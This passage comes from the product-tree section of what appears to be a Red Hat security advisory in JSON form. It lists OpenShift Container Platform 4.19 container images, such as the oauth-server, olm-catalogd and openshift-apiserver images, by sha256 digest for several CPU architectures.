"name": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64",
